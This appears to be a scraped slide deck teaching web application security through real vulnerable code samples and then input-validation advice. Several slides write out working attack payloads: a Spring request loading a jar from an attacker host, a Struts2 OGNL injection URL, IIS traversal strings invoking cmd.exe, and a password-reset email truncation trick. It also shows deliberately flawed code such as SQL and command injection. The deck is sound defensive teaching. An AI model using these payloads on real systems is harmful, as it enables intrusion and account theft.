440 likes | 583 Vues
DON’T TRY TH. IS AT HOME. Some of the code examples in this presentation may shock even the strongest of developers. If you are faint of heart, or don’t like a good laugh, then it may pay to leave the room...... No really. JAVA. PERL. PHP. PYTHON. ASP. FLASH. C#. C, C++. VB.Net. CFML.
E N D
DON’T TRY TH IS AT HOME
Some of the code examples in this presentation may shock even the strongest of developers. If you are faint of heart, or don’t like a good laugh, then it may pay to leave the room...... No really...
JAVA PERL PHP PYTHON ASP FLASH C# C, C++ VB.Net CFML All Languages Can Lead To Security Vulnerabilities
Abritrary Graph Of Statistics Of Vulnerabilities 3rd Hit Is A Vulnerability In A Graph Application And Its SQL Injection Have I Mentioned 2010 Yet?
Abritrary Graph Of Statistics Of Vulnerabilities http://www.cenzic.com/downloads/Cenzic_AppsecTrends_Q3-Q4-2009.pdf
Abritrary Graph Of Statistics Of Vulnerabilities http://www.cenzic.com/downloads/Cenzic_AppsecTrends_Q3-Q4-2009.pdf
Abritrary Graph Of Statistics Of Vulnerabilities Huh? http://www.cenzic.com/downloads/Cenzic_AppsecTrends_Q3-Q4-2009.pdf
Apologies The code you are about to see comes from real applications, only the variable names have been changed to protect the guilty. If this code resembles yours, you may want to take notes...
What's Wrong With This Picture if (!string.IsNullOrEmpty( Request.QueryString["Eid"])) CMSMain.WhereCondition = "TitleIDIN (SELECT TitleID FROM CMS_Documents WHERE EID = " + Request.QueryString["Eid"] + ")“; Data Access Through Framework Frameworks Don’t Always Protect You
Framework Bugs Spring Framework • Spring Framework execution of arbitrary code • http://blog.o0o.nu/2010/06/cve-2010-1622.html Any Form Controller POST /adduser HTTP/1.0 ... class.classLoader.URLs[0]= jar:http://attacker/spring-exploit.jar!/ Overwrite The WebappClassLoader URL With An Arbitrary Remote Jar
Framework Bugs Struts2/XWork Framework • Struts2 Framework execution of arbitrary code • http://blog.o0o.nu/2010/07/cve-2010-1870-struts2xwork-remote.html http://mydomain/MyStruts.action? ('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa) (('\u0023context[\'xwork.MethodAccessor.den yMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf) (('\u0023rt.exit(1)') (\u0023rt\u003d@java.lang.Runtime@getRunti me()))=1 Execute Arbitrary Java Code
OWASP Top 10 “Lets make a list...”
Trusting Filenames From The User Image Loader • Called via pages to display images • Passed an image name in the URL public void ProcessRequest(HttpContext context) { string ImageUrl = context.Request.QueryString["ImageUrl"]; .. context.Response.WriteFile(ImageUrl); } Retrieve Arbitrary File From Server
Trusting URLS From The User Help System Page Loader • Called to load help contents from other server • Passed a page reference in the URL public byte[] GetBytesFromUrl(string url) { HttpWebRequest myReq = WebRequest.Create(url); var webResponse = webRequest.GetResponse(); using (var responseStream = webResponse.GetResponseStream()) { return responseStream.ToBytes(); } } Make Internal Network Requests
Using 302 Redirect As Security Measure Making Unauthenticated Request • Results in a 302 redirect to the login page HTTP/1.1 302 Found Location: /admin/login Content-Type: text/html; charset=utf-8 Content-Length: 13226 <html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="/admin/login">here</a>.</h2> </body></html> That Seems Suspiciously Large
Using 302 Redirect As Security Measure HTTP/1.1 302 Found Location: /admin/login Content-Type: text/html; charset=utf-8 Content-Length: 13226 <html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="/admin/login">here</a>.</h2> </body></html> <html> <head id="_ctl1_Head1"><title> File Upload </title><link href=“ Oh there it is.
CAPTCHAS Things that work
CAPTCHAS Things that DO NOT work • Posting the CAPTCHA answer and response • Posting the CAPTCHA ‘id’ and response • Using HTML to display the CAPTCHA ‘word’ • Using HTML to display a mathematical equation to solve POST /captcha HTTP/1.0 answer=kbpsh&response=kbpsh.... <html> Please type in these letters: kbpsh </html>
Shopping Cart Troubles Usual Shopping Process
Shopping Cart Troubles My Shopping Process Add To Cart Contents After Payment Processed
Flash Accepts User Input Image Loader • Flash loaded by HTML page • HTML page sets parameters Can Be Set Via URL Parameters private var imgPath:String; imgPath = "http://localhost/sample.jpg" : img = this.loaderInfo.parameters.img; img_holder = new Image(imgPath); Flash Movie Host On Your Site, Loading Images From Attackers Site
Cross System Data Truncation Forgotten Password Feature • Page accepts email address and checks it is valid strEmail = Request.Form("txtemail") If strEmail <> "" Then objQRY.ClearParameters objQRY.AddParameter "@email", trim(strEmail) set rsLogin = objQRY.ReturnRS("spUserMatch") Calls A Stored Procedure
Cross System Data Truncation Forgotten Password Feature • Stored procedures does a user lookup CREATE PROCEDURE [dbo].[spUserMatch] @email varchar(100) = null ... Truncates Input To 100 Characters
Cross System Data Truncation Forgotten Password Feature • If user exists, send email with new password Set Mailer = Server.CreateObject("SMTPsvg.Mailer") Mailer.Subject = "New Password" Mailer.BodyText = strBody Mailer.Recipient = strEmail Uses The Original Input (Non Truncated) Attacker Receives Copy Of Email <valid email address><100 spaces>;<attacker email address>
Cookie Data Serialisation Object Serialised • Base64 encoded and stored as cookie // create map java.util.HashMap map = new java.util.HashMap(); map.put("UserId", UserId); map.put("email", email); // Serialise and B64 it String info = java.net.URLEncoder.encode(new String(org.apache.commons.codec.binary.Base64.encodeBase64(buffer.toByteArray()),"UTF-8"),"UTF-8"); // Store it in cookie org.apache.cocoon.environment.http.HttpCookie cookie = new org.apache.cocoon.environment.http.HttpCookie("SESSION", info);
Cookie Data Serialisation Object Is Stored Insecurely In Cookie • Base64 is not encryption Cookie Data Can Be Decoded • And modified • And recoded • And sent back Application Deserialises It • And trusts it • And attacker gains access as another userID
Lets Not Leave Out PHP Execute System() With User Supplied Input • This was for real.... In a ‘security’ appliance used by .mil if ($_GET["cmd"] == "TERMEND") { $sid = $_GET["param"]; $cmd = "/var/www/htdocs/utt/Queue.pl delete_message_queue $sid"; system($cmd); Did I Mention That It Was Unauthenticated Access
Cookies Well, This Sure Looks Useful void CheckLoginCount() { HttpCookie cookie = Request.Cookies["LoginAttempts"]; if (cookie != null) { int attempts = cookie.Value; if (attempts >= 5) Redirect("~/AccessDenied.aspx”); } }
More Cookies Remember Me Functionality • User selects remember me • Application generates random token • Stores token in cookie, and in database $token = substr(md5(uniqid(rand(), true)), 0, 49 - strlen($this->ID)); $this->RememberLoginToken = $token; Cookie::set('rem_me', $this->ID . ':' . $token);
More Cookies Remember Me Functionality • User selects to logout • Application sets token to null • Stores null in cookie, and in database $this->RememberLoginToken = null; Cookie::set('rem_enc', null);
More Cookies Remember Me Functionality • If the user doesn’t logout they use the autologin feature • Application loads user based on cookie value • Application checks the $tokens match list($uid, $token) = explode(':', Cookie::get(‘rem_me'), 2); $a_uid = Convert::raw2sql($uid); $user = DataObject:: get_one(“User", “User.ID = '$a_uid'"); if($user && $user->RememberLoginToken != $token) { $member = null; } What Happens If $token is empty (null)
Evil Users Never Trust User Supplied Input No really, users are evil And Hands Leap Out Of Matrix Style Backgrounds
Input Validation Input Validation Is The Key • No I didn’t say ‘silver bullet’ • Properly implemented can prevent most app vulns Validate At Input • Validate all input to ensure if conforms to the required format Validate All Input • Text strings, Cookie values, HTTP headers • File data, Path names, URL values, Currency • Data from databases, 3rd parties, web services
Client Site Validation • Should only be used to reduce browser requests • Never rely on client side validation for security Backend Validation • Validate the data • Ensure the user is authorised to access data records • Should not matter what values the user sends
Data Normalisation Data Comes In Many Forms • “this is data” • %74%68%69%73%20%69%73%20%64%61%74%61 • this is data • “ThIsiSdAtA” Many paths to the same location • /help.jsp?page=user/welcome.htm • /help.jsp?page=user/../admin/welcome.htm • /help.jsp?page=user\..\admin/welcome.htm • /help.jsp?page=user\/\/..//\\/admin/welcome.htm • /help.jsp?page=help.jsp
Data Decoding or Normalisation Depending On Application • Decode or reject Detect Encoded Data • Decode the data and compare to original Decode Recursively To Its Lowest Form • Concatenation of paths • Multiple layers of encoding Formalise Decoding Order • To prevent unintended decoding later in the application
Data Decoding And Validation FAIL MS Extended Unicode vulnerability MS Double Decode vulnerability NGINX Source Code Disclosure /scripts/..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir http://www.example.com/file.php%20
Conforms Ensure Data Conforms To Required Format • Check length, type, min() max() values • Alphanumeric only • Must be a valid date Reject Bad Data • Do not attempt to fix it up • Easily leads to confusion Use Data Whitelists • Checks against a list of known good values • Easier to know which values are good input • The recommended approach
Santise Data For Use Data Will Be Used In Different Place • SQL, XML, Output, Log files Requires Different Sanitisation • Remove meta chars • Remove special characters • Remove Linefeeds Use Standard Formalised Reusable Code Blocks • Most languages contain these • OWASP supplies some • Homebrew stuff should be well tested and documented at the start of development
When Filtering Goes Wrong This Is Not Filtering And Yes, XSS without <script> is possible Don’t Forget To Escape The Escape Character If (imageurl = “/web.config”) exit() If (req.getParameter(‘name’) .indexOf("<script") > 0 exit() input.Replace("+", "\\+").Replace("=", "\\=").Replace("(", "\\(").Replace(")", "\\)") .Replace("*", "\\*").Replace("&", "\\&").Replace("!", "\\!").Replace("|","\\|"));
Back To The Code Things To Try At Home • Review your own code • Conduct internal peer reviews • Have a set of standards, and stick to them Grepping The Code • Looking for where user input is used • Looking for dangerous syntax use • Particular attention to ‘danger areas’ such as file upload • Review the stored procedures Think Like An Attacker • Want to ‘break the code’